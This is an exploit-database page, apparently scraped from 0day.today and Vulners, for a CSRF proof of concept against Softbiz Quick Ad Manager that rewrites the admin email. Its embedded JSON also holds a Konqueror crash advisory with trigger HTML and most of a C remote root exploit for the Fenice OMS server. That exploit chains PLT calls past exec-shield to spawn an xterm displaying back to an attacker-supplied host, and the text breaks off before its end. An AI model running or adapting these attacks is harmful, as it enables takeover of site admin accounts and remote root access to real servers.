Search...

Softbiz Quick Ad Manager CSRF

2012-03-12T00:00:00

ID 1337DAY-ID-17678
Type zdt
Reporter Jonturk75
Modified 2012-03-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Softbiz Quick Ad Manager CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/softbiz-quick-ad-manager/32339/
# Category::  webapps
# Demo : http://www.softbizscripts.com/scripts/ba/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


&lt;form action="updateconfig.php" method="post" name="frm1" id="frm1"  onSubmit="return Validator(this);" &gt;
&lt;input type="hidden" size="35" value="[email protected]" id="adminemail3" class="box1" name="adminemail"/&gt;
&lt;input type="submit" value="Update Site Configuration" class="submit" name="Submit2"/&gt;
&lt;/form&gt;



#  0day.today [2018-02-17]  #

JSON Vulners Source

Initial Source

{"hash": "af64a63a9fb41b682db16c2574f3f5ad05e39a64942af973cebe9e48691c2ba4", "id": "1337DAY-ID-17678", "lastseen": "2018-02-17T21:23:42", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "cc30031148929b962fa40f36ac33feb7", "key": "href"}, {"hash": "a7e13916ea41deb3b3e835e0fa65f974", "key": "modified"}, {"hash": "a7e13916ea41deb3b3e835e0fa65f974", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c747582e8f72585c866b80c4ded208f7", "key": "reporter"}, {"hash": "289aa1827c243bf238849850a0920bcd", "key": "sourceData"}, {"hash": "560a2f290b73c61079d9b201d37988ed", "key": "sourceHref"}, {"hash": "0728194659f36e54b92912eec61bad3e", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-02-17T21:23:42"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:17678", "SECURITYVULNS:VULN:7998", "SECURITYVULNS:VULN:6851", "SECURITYVULNS:DOC:6851", "SECURITYVULNS:VULN:1172", "SECURITYVULNS:DOC:1172"]}, {"type": "zdt", "idList": ["1337DAY-ID-8911", "1337DAY-ID-8700", "1337DAY-ID-5982"]}], "modified": "2018-02-17T21:23:42"}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17678", "description": "Exploit for php platform in category web applications", "title": "Softbiz Quick Ad Manager CSRF", "history": [{"bulletin": {"hash": "eb64a8c91d385f374759efe8edc0b268755fd13a9d29bb069273d22c7a2223e5", "id": "1337DAY-ID-17678", "lastseen": "2016-04-20T00:57:30", "enchantments": {"score": {"value": 3.5, "modified": "2016-04-20T00:57:30"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "a7e13916ea41deb3b3e835e0fa65f974", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "054f850b2ed59e19ccfe314432dbf8fd", "key": "href"}, {"hash": "a7e13916ea41deb3b3e835e0fa65f974", "key": "published"}, {"hash": "8cbc953b2cccc99899d4e2d91dd9c3b3", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0728194659f36e54b92912eec61bad3e", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "63adac6ccffb04a916f4e23bd2211bac", "key": "sourceData"}, {"hash": "c747582e8f72585c866b80c4ded208f7", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17678", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Softbiz Quick Ad Manager CSRF", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: Softbiz Quick Ad Manager CSRF\r\n# Author: Jonturk75\r\n# Vendor or Software Link: http://www.scripts.com/viewscript/softbiz-quick-ad-manager/32339/\r\n# Category:: webapps\r\n# Demo : http://www.softbizscripts.com/scripts/ba/admin/\r\n# Greetz: Inj3ct0r Exploit DataBase 1337day.com\r\n\r\n\r\n<form action=\"updateconfig.php\" method=\"post\" name=\"frm1\" id=\"frm1\" onSubmit=\"return Validator(this);\" >\r\n<input type=\"hidden\" size=\"35\" value=\"yourmail@mail.com\" id=\"adminemail3\" class=\"box1\" name=\"adminemail\"/>\r\n<input type=\"submit\" value=\"Update Site Configuration\" class=\"submit\" name=\"Submit2\"/>\r\n</form>\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2012-03-12T00:00:00", "references": [], "reporter": "Jonturk75", "modified": "2012-03-12T00:00:00", "href": "http://0day.today/exploit/description/17678"}, "lastseen": "2016-04-20T00:57:30", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: Softbiz Quick Ad Manager CSRF\r\n# Author: Jonturk75\r\n# Vendor or Software Link: http://www.scripts.com/viewscript/softbiz-quick-ad-manager/32339/\r\n# Category:: webapps\r\n# Demo : http://www.softbizscripts.com/scripts/ba/admin/\r\n# Greetz: Inj3ct0r Exploit DataBase 1337day.com\r\n\r\n\r\n<form action=\"updateconfig.php\" method=\"post\" name=\"frm1\" id=\"frm1\" onSubmit=\"return Validator(this);\" >\r\n<input type=\"hidden\" size=\"35\" value=\"[email\u00a0protected]\" id=\"adminemail3\" class=\"box1\" name=\"adminemail\"/>\r\n<input type=\"submit\" value=\"Update Site Configuration\" class=\"submit\" name=\"Submit2\"/>\r\n</form>\r\n\r\n\n\n# 0day.today [2018-02-17] #", "published": "2012-03-12T00:00:00", "references": [], "reporter": "Jonturk75", "modified": "2012-03-12T00:00:00", "href": "https://0day.today/exploit/description/17678"}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: RIPEMD160\r\n\r\n ---------------------------------------------------\r\n| BuHa Security-Advisory #16 | Aug 01st, 2007 |\r\n ---------------------------------------------------\r\n| Vendor | KDE's Konqueror |\r\n| URL | http://www.konqueror.org/ |\r\n| Version | <= 3.5.7 |\r\n| Risk | Low (Denial Of Service) |\r\n ---------------------------------------------------\r\n\r\no Description:\r\n=============\r\n\r\nKonqueror is the file manager for the K Desktop Environment and an\r\nOpen Source web browser with HTML 4.01 compliance.\r\n\r\nVisit http://www.konqueror.org/ for detailed information.\r\n\r\no Denial of Service:\r\n===================\r\n\r\nFollowing HTML code forces Konqueror to crash:\r\n> <textarea></button></textarea></br><bdo dir="">\r\n> <pre><frameset>\r\n> <a>\r\n\r\nOnline-demo:\r\nhttp://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html\r\n\r\n> (gdb) set args konqueror.html\r\n> (gdb) r\r\n> Starting program: /usr/bin/konqueror konqueror.html\r\n> (no debugging symbols found)\r\n> [...]\r\n> [Thread debugging using libthread_db enabled]\r\n> [New Thread -1234381104 (LWP 5982)]\r\n> (no debugging symbols found)\r\n> [...]\r\n> Qt: gdb: -nograb added to command-line options.\r\n> Use the -dograb option to enforce grabbing.\r\n> X Error: BadDevice, invalid or uninitialized input device 169\r\n> Major opcode: 145\r\n> Minor opcode: 3\r\n> Resource id: 0x0\r\n> Failed to open device\r\n> X Error: BadDevice, invalid or uninitialized input device 169\r\n> Major opcode: 145\r\n> Minor opcode: 3\r\n> Resource id: 0x0\r\n> Failed to open device\r\n> (no debugging symbols found)\r\n> [...]\r\n>\r\n> Program received signal SIGSEGV, Segmentation fault.\r\n> [Switching to Thread -1234381104 (LWP 5982)]\r\n> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.\r\n\r\nI sent a mail to KDE's security mailing list [1] and received an answer\r\nfrom Dirk Mueller several days later. He wrote that the HTML code triggers\r\nan assert and when commenting out the assert the backtrace ends in:\r\n\r\n> #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)\r\n> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65\r\n> #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,\r\n> obj=0x0)\r\n> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624\r\n\r\nThis issue does not seem to be exploitable.\r\n\r\no Disclosure Timeline:\r\n=====================\r\n\r\n03 May 07 - DoS vulnerability discovered.\r\n07 May 07 - Vendor contacted.\r\n10 May 07 - Vendor confirmed vulnerability.\r\n01 Aug 07 - Public release.\r\n\r\no Solution:\r\n==========\r\n\r\nThere is no solution yet. I assume the KDE developers will address this\r\nbug in an upcoming KDE release.\r\n\r\no Credits:\r\n=========\r\n\r\nThomas Waldegger <bugtraq@morph3us.org>\r\nBuHa-Security Community - http://buha.info/board/\r\n\r\nIf you have questions, suggestions or criticism about the advisory feel\r\nfree to send me a mail. The address 'bugtraq@morph3us.org' is more a\r\nspam address than a regular mail address therefore it's possible that I\r\nignore some mails. Please use the contact details at http://morph3us.org/\r\nto contact me.\r\n\r\nGreets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,\r\nRodnox, trappy and all members of BuHa.\r\n\r\nAdvisory online:\r\nhttp://morph3us.org/advisories/20070801-konqueror-3.57.txt\r\n\r\n[1] http://www.kde.org/info/security/\r\n\r\n- --\r\nDon't you feel the power of CSS Layouts?\r\nBuHa-Security Community: https://buha.info/board/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: n/a\r\nComment: http://morph3us.org/\r\n\r\niD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16\r\nWHuq7rPUBPx1/5nx+jJUPDg=\r\n=R4ZU\r\n-----END PGP SIGNATURE-----", "modified": "2007-08-03T00:00:00", "published": "2007-08-03T00:00:00", "id": "SECURITYVULNS:DOC:17678", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17678", "title": "[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "Crash on invalid sequences of open and close HTML tags.", "modified": "2007-08-03T00:00:00", "published": "2007-08-03T00:00:00", "id": "SECURITYVULNS:VULN:7998", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7998", "title": "KDE Konqueror DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-03T21:39:33", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2007-04-29T00:00:00", "published": "2007-04-29T00:00:00", "id": "1337DAY-ID-8911", "href": "https://0day.today/exploit/description/8911", "type": "zdt", "title": "Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)", "sourceData": "===================================================================\r\nFenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)\r\n===================================================================\r\n\r\n/*\r\n**\r\n** Fedora Core 6 (exec-shield) based\r\n** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\r\n** by Xpl017Elz\r\n**\r\n** Advanced exploitation in exec-shield (Fedora Core case study)\r\n** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt\r\n**\r\n** Reference: http://www.securityfocus.com/bid/17678\r\n** vendor: http://streaming.polito.it/legacy_server\r\n**\r\n** --\r\n** exploit by \"you dong-hun\"(Xpl017Elz), <[email\u00a0protected]>.\r\n** My World: http://x82.inetcop.org\r\n**\r\n*/\r\n/*\r\n** -=-= POINT! POINT! POINT! POINT! POINT! =-=-\r\n**\r\n** This is a very common standalone daemon remote buffer overflow vulnerability.\r\n** I used the method that I used on my proftpd exploit again to avoid random mapping library.\r\n** And I'm plainning to publish it in English.\r\n**\r\n** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt\r\n**\r\n** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more.\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n\r\n\r\n#define UNAME_PLT 0x8048e9c // <[email\u00a0protected]> // randomCI\u00c2\u00b0O mapping\u00c2\u00b5C?A (execle()>>16)&0xff GOT 1byte?\u00c2\u00a6 E\u00c2\u00ae??CI\u00c2\u00b1a A\u00c2\u00a7CO\r\n\r\n#define STRCPY_PLT 0x08048ffc // <[email\u00a0protected]>\r\n#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>: pop %ebx // retA\u00c2\u00bb ??CO AN 12byte AI\u00c2\u00b5? (nergal's idea)\r\n\r\n#define GETGID_GOT 0x8059234 // execle() CO?o AO?O?\u00c2\u00a6 AOAC\u00c2\u00b7I A\u00c2\u00b6COCI?\u00c2\u00a9 ?OA\u00c2\u00bb GOT AO?O\r\n/*\r\n\t(gdb) x/x 0x8059234\r\n\t0x8059234 <_GLOBAL_OFFSET_TABLE_+324>: 0x08049222\r\n\t(gdb) x 0x08049222\r\n\t0x8049222 <[email\u00a0protected]+6>: 0x00027068\r\n\t(gdb)\r\n*/\r\n#define GETGID_PLT\t0x0804921c // <[email\u00a0protected]> // GOT A\u00c2\u00b6CO AIEA, PLT?\u00c2\u00a6 AeCO execle() CO?o CU\u00c2\u00b5e?\u00c2\u00b5\r\n\r\n\r\n#define EXECLE_16_0xff\t0x8059156 // (execle()>>16)&0xff // uname CO?oAC 1byte: 0x!!0000\r\n#define EXECLE_08_0xff\t0x80591b5 // (execle()>>8)&0xff // bind CO?oAC 1byte: 0x00!!00\r\n#define EXECLE_00_0xff\t0x8048e83 // (execle()>>0)&0xff // ???OAo A\u00c2\u00a4AuAI 1byte: 0x0000!!\r\n\r\n\r\n/* A\u00c2\u00a4AuA?\u00c2\u00b7I A?\u00c2\u00b1U \u00c2\u00b0??ECN ?o?U\u00c2\u00b0? AOA\u00c2\u00bb \u00c2\u00b0??i, CE?a ?oA? */\r\n#define DATA_LOC 0x805af4c // heap ?o \u00c2\u00b0o\u00c2\u00b0?A\u00c2\u00bb AI?e\r\n\r\n\r\n/* /usr/X11R6/bin/xterm */\r\n#define ARG1_LOC\t0x805af4c // A\u00c2\u00b6CO\u00c2\u00b5E ?i\u00c2\u00b7E ?AAU AO?O (argv[0],argv[1]\u00c2\u00b7I ??AO)\r\n#define SLASH_STR\t0x8055acb // \"/\"\r\n#define XTERM_STR_1\t0x804875d // \"us\"\r\n#define XTERM_STR_2\t0x80585ce // \"r/\"\r\n#define X_STR_1\t\t0x8048df3 // \"X\"\r\n#define R_STR\t\t0x804a572 // \"R\"\r\n#define XTERM_STR_3\t0x804882c // \"bin\"\r\n#define X_STR_2\t\t0x8048e33 // \"x\"\r\n#define XTERM_STR_4\t0x8056a33 // \"term\"\r\n\r\n\r\n/* -display */\r\n#define ARG2_LOC\t0x805af61 // A\u00c2\u00b6CO\u00c2\u00b5E ?E?C ?AAU AO?O (argv[2]\u00c2\u00b7I ??AO)\r\n#define DISPLAY_OPTION\t0x80584b8 // \"-di\"\r\n\r\n\r\n/* xhost_ip:0 */\r\n#define ARG3_LOC\t0x805af65 // A\u00c2\u00b6CO\u00c2\u00b5E xhost IP ?AAU AO?O (argv[3]A?\u00c2\u00b7I ??AO)\r\n#define NUM_0\t\t0x8053285 // \"0\"\r\n#define NUM_1\t\t0x804ef17 // \"1\"\r\n#define NUM_2\t\t0x804b37b // \"2\"\r\n#define NUM_3\t\t0x804d622 // \"3\"\r\n#define NUM_4\t\t0x804e583 // \"4\"\r\n#define NUM_5\t\t0x80554d7 // \"5\"\r\n#define NUM_6\t\t0x8052341 // \"6\"\r\n#define NUM_7\t\t0x804d14a // \"7\"\r\n#define NUM_8\t\t0x8048db3 // \"8\"\r\n#define NUM_9\t\t0x80516bb // \"9\"\r\n\r\n\r\n#define COLON_STR 0x8057abb // \":\"\r\n#define NULL_STR 0x805afbe // 0x00000000\r\n\r\n\r\nint main(int argc,char *argv[]){\r\n\tint i=0,j=0;\r\n\tstruct hostent *se;\r\n\tstruct sockaddr_in saddr;\r\n\tunsigned long ip,ip1,ip2,ip3,ip4;\r\n\tunsigned char do_ex[4096];\r\n\tunsigned char xhost_ip[256];\r\n\tint sock;\r\n\tchar host[256];\r\n\tint port=554;\r\n\r\n\tmemset((char *)do_ex,0,sizeof(do_ex));\r\n\tip=ip1=ip2=ip3=ip4;\r\n\r\n\r\n\tprintf(\"/*\\n**\\n** Fedora Core 6 (exec-shield) based\\n\"\r\n\t\t\"** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\\n\"\r\n\t\t\"** by Xpl017Elz\\n**\\n\");\r\n\tif(argc<2){\r\n\t\tprintf(\"** Usage: %s [host] [port] [xhost ip]\\n\",argv[0]);\r\n\t\tprintf(\"**\\n** host: Fenice 1.10 Open Media Streaming Server\\n\");\r\n\t\tprintf(\"** port: default 554\\n\");\r\n\t\tprintf(\"** xhost ip: attacker xhost\\n**\\n\");\r\n\t\tprintf(\"** Example: %s fenice.omss.co.kr 554 82.82.82.82\\n**\\n*/\\n\",argv[0]);\r\n\t\texit(-1);\r\n\t}\r\n\telse {\r\n\t\tsscanf(argv[3],\"%d.%d.%d.%d\",&ip1,&ip2,&ip3,&ip4);\r\n#define IP1 16777216\r\n#define IP2 65536\r\n#define IP3 256\r\n\t\tip=0;\r\n\t\tip+=ip1 * (IP1);\r\n\t\tip+=ip2 * (IP2);\r\n\t\tip+=ip3 * (IP3);\r\n\t\tip+=ip4;\r\n\r\n\t\tmemset((char *)xhost_ip,0,256);\r\n\t\tsprintf(xhost_ip,\"%10lu\",ip);\r\n\t}\r\n\r\n\tmemset((char *)host,0,sizeof(host));\r\n\tstrncpy(host,argv[1],sizeof(host)-1);\r\n\tport=atoi(argv[2]);\r\n\r\n\tse=gethostbyname(host);\r\n\tif(se==NULL){\r\n\t\tprintf(\"** gethostbyname() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tsock=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sock==-1){\r\n\t\tprintf(\"** socket() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tsaddr.sin_family=AF_INET;\r\n\tsaddr.sin_port=htons(port);\r\n\tsaddr.sin_addr=*((struct in_addr *)se->h_addr);\r\n\tbzero(&(saddr.sin_zero),8);\r\n\r\n\r\n\tprintf(\"** make exploit\\n\");\r\n\tsprintf(do_ex,\"GET /\");\r\n\tj=strlen(do_ex);\r\n\tfor(i=0;i<320;i++,j++){\r\n\t\tsprintf(do_ex+j,\"A\");\r\n\t}\r\n\r\n#define __GOGOSSING(dest,index,src){\\\r\n\t*(long *)&dest[index]=src;\\\r\n\tindex+=4;\\\r\n}\r\n\r\n\t__GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT \u00c2\u00b0? A\u00c2\u00a4?o */\r\n\t// execle() AO?O A\u00c2\u00b6CO\r\n\t{\r\n\t\ti=0;\r\n\t\t/* (execle()>>0)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_00_0xff);\r\n\t\t/* (execle()>>8)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_08_0xff);\r\n\t\t/* (execle()>>16)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_16_0xff);\r\n\t}\r\n\t// argv[0],argv[1]: /usr/X11R6/bin/xterm\r\n\t{\r\n\t\ti=0;\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_1);\r\n\t\ti+=2; /* \"us\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_2);\r\n\t\ti+=2; /* \"r/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,X_STR_1);\r\n\t\ti+=1; /* \"X\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\ti+=1; /* \"1\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\ti+=1; /* \"1\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,R_STR);\r\n\t\ti+=1; /* \"R\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_6);\r\n\t\ti+=1; /* \"6\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_3);\r\n\t\ti+=3; /* \"bin\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,X_STR_2);\r\n\t\ti+=1; /* \"x\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_4);\r\n\t\ti+=4; /* \"term\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// argv[2]: -display\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,DISPLAY_OPTION);\r\n\t\ti+=3; /* \"-di\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// argv[3]: xhost_ip:0\r\n\tfor(ip=0;ip<10;ip++){\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\r\n\t\tswitch(xhost_ip[ip]){\r\n\t\t\tcase '0':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_0);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '1':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '2':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_2);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '3':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_3);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '4':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_4);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '5':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_5);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '6':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_6);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '7':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_7);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '8':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_8);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '9':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_9);\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t\ti+=1;\r\n\t}\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,COLON_STR);\r\n\t\ti+=1; /* \":\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_0);\r\n\t\ti+=1; /* \"0\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// exploit\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,GETGID_PLT); // getgidAC GOT?A execle() CO?o?\u00c2\u00a6 \u00c2\u00b0?Ao?C\u00c2\u00b7I, PLT\u00c2\u00b7I CU\u00c2\u00b5e?\u00c2\u00b5 \u00c2\u00b0??E.\r\n\t\t__GOGOSSING(do_ex,j,0x82828282); // callAI ???I?C\u00c2\u00b7I, AIAu CO?o %eip?\u00c2\u00a6 ?e?ACO?\u00c2\u00ad A\u00c2\u00a4?o.\r\n\t\t__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */\r\n\t\t__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */\r\n\t\t__GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */\r\n\t\t__GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */\r\n\t}\r\n\tprintf(\"** exploit size: %d\\n\",strlen(do_ex));\r\n\r\n\ti=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));\r\n\tif(i==-1){\r\n\t\tprintf(\"** connect() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\telse {\r\n\t\tprintf(\"** send exploit\\n\");\r\n\t\tsend(sock,do_ex,j,0);\r\n\r\n\t\tprintf(\"** 